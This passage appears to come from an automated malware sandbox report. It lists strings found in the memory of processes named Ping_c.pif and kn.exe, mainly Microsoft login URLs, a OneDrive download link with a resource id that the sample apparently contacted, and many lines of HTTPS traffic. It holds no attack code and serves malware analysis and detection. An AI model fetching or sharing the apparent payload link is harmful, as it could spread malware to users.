        Source: Ping_c.pif, 0000001F.00000003.1985735249.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1986181997.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=FBC5B09AC4FC4D5F&opid=C97772AF3A35076
        Source: Ping_c.pif, 0000001F.00000003.1786740158.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsig
        Source: Ping_c.pif, 0000001F.00000002.2726741587.00000000271E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1
        Source: Ping_c.pif, 0000001F.00000003.2177405424.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&r
        Source: Ping_c.pif, 0000001F.00000003.1634328519.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1635151705.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928543&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1706868174.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706715603.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928551&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1859752445.00000000271E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928566&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2020192072.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928582&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2111822434.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928591&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2216274021.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928594&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2177405424.00000000271E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928598&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2216187948.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427092342.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928602&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2428114955.000000002721B000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2428114955.00000000271E7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928623&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2523723266.000000002721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928632&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2555976408.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928636&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000002.2703452505.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2726741587.000000002721D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928650&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1593066185.00000000007B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928539&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1673627946.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928547&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1819846373.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928554&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1819846373.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928558&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1853005680.00000000007F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928563&rver=7.5.
        Source: Ping_c.pif, 0000001F.00000003.1819846373.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928563&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1888960239.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888960239.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953069294.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928569&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1921671898.000000000081B000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1921671898.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1922014929.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928572&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2048630262.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2144538741.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928575&rver=7.5.
        Source: Ping_c.pif, 0000001F.00000003.1953069294.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928575&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.1985865304.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928579&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2048890593.000000000081B000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.000000002721A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928585&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2080225046.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928588&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2288367402.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928605&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2288367402.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.000000000081B000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.000000002721D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928609&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2321332613.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928612&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2357978518.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928616&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2427092342.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928619&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2555257376.0000000027219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928626&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2492438082.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928629&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928639&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000003.2627952934.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928642&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000002.2726741587.00000000271E0000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928646&rver=7.5.2205.0&wp=MBI_SSL_SH
        Source: Ping_c.pif, 0000001F.00000002.2703452505.000000000072E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.055
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/s
        Source: Ping_c.pif, 0000001F.00000003.1706671192.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/t
        Source: Ping_c.pif, 0000001F.00000003.2357978518.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321332613.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/z
        Source: Ping_c.pif, 0000001F.00000003.1633821115.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1634328519.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1666497605.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673520794.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/~
        Source: Ping_c.pif, 0000001F.00000003.1706715603.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928551&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.1859752445.00000000271E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928566&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.2020192072.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928582&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000002.2703452505.000000000081B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928650&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.1744390876.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1737745516.00000000007E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928554&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.1882235098.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928569&rver=7.5.2205.0&wp=MBI_SS
        Source: Ping_c.pif, 0000001F.00000003.2080476478.00000000007AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928588&rver=7.5.2205.0&wp=MBI_SS
        Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
        Source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
        Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
        Source: Ping_c.pif, 0000001F.00000003.1888960239.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.ms
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msauth.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msauth.net/
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msftauth.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msftauth.net/
        Source: Ping_c.pif, 0000001F.00000003.1673627946.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2726741587.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.000000002727A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.0000000027222000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793730015.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460371452.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.0000000027222000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888837366.0000000027215000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1985735249.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.00000000271F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2250753517.0000000027276000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.0000000027240000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.0000000027203000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.000000002727A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2250753517.0000000027282000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2493024630.000000002723E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico
        Source: Ping_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.0000000027286000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826526825.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1635151705.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1920846634.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.0000000027286000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1737658652.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1859650606.00000000271F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706649495.00000000271F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1786740158.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1633584244.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321978307.000000002723A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.js
        Source: Ping_c.pif, 0000001F.00000003.2394138435.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
        Source: Ping_c.pif, 0000001F.00000003.2216274021.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321332613.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744531159.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523153256.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2588420742.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/No
        Source: Ping_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523153256.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793730015.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1922014929.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2020461089.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627952934.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2703452505.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2492438082.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826725982.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?res=1EA3E8EA0AAD572E%21216&authkey=
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=
        Source: Ping_c.pif, 0000001F.00000003.1826725982.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/fo
        Source: Ping_c.pif, 0000001F.00000003.2020461089.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/zfo
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53566 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53564
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53563
        Source: unknownNetwork traffic detected: HTTP traffic on port 53572 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53569
        Source: unknownNetwork traffic detected: HTTP traffic on port 53537 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53567
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53566
        Source: unknownNetwork traffic detected: HTTP traffic on port 53552 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53575 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53572
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53570
        Source: unknownNetwork traffic detected: HTTP traffic on port 53546 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53569 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53523 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53540 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53563 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53576
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53575
        Source: unknownNetwork traffic detected: HTTP traffic on port 53511 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53557 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53573
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53579
        Source: unknownNetwork traffic detected: HTTP traffic on port 53532 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53519 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53578
        Source: unknownNetwork traffic detected: HTTP traffic on port 53578 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53582
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53581
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 53581 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 53543 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 53526 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53560 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 53587 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53587
        Source: unknownNetwork traffic detected: HTTP traffic on port 53570 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53585
        Source: unknownNetwork traffic detected: HTTP traffic on port 53593 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53584
        Source: unknownNetwork traffic detected: HTTP traffic on port 53531 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
